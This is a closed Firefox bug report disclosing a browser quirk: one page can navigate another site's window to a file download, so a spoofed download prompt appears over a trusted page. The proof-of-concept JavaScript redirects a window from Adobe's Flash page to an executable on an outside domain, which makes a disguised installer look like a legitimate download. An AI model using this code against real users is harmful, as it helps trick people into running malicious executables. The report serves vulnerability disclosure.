Closed
Bug 1342324
Opened 8 years ago
Closed 8 years ago
Navigating to non-same origin windows.
Categories
(Firefox :: Untriaged, defect)
RESOLVED DUPLICATE of bug 741050
People
(Reporter: mishra.dhiraj95, Unassigned)
Attachments (1 file): 631.48 KB, application/zip
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0
Build ID: 20170118123525
Steps to reproduce:
Firefox Version:
FF ESR in Windows 7
FF Stable in Windows 7
Another interesting navigation trick.
It is a little-known property of web browsers that one document can always navigate other, non-same-origin windows to arbitrary URLs. Perhaps more interestingly, you can also navigate third-party documents to resources served with Content-Disposition attachment, in which case, you get the original contents of the address bar, plus a rogue download prompt attached to an unsuspecting page that never wanted you to download that file.
Expected results:
Code :
<input type=submit onclick="doit()" value="Click me. I like to be clicked.">
<script>
  var w;
  var once;
  function doit() {
    if (navigator.userAgent.indexOf('MSIE') != -1)
      w = window.open('page2.html', 'foo');
    else
      w = window.open('data:text/html,<meta http-equiv="refresh" content="0;URL=http://get.adobe.com/flashplayer/download/?installer=Flash_Player_11_for_Internet_Explorer_(64_bit)&os=Windows%207&browser_type=MSIE&browser_dist=OEM&d=Google_Toolbar_7.0&PID=4166869">', 'foo');
    setTimeout(donext, 4500);
  }
  function donext() {
    window.open('http://hackies.in/flashplayer24_ka_install.exe', 'foo');
    if (once != true) setTimeout(donext, 5000);
    once = true;
  }
</script>
Live Demo : http://hackies.in/nav.html
Attaching the test case and the video POC for reference.
Comment 1 • 8 years ago
Please don't just copy and paste lcamtuf posts.
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE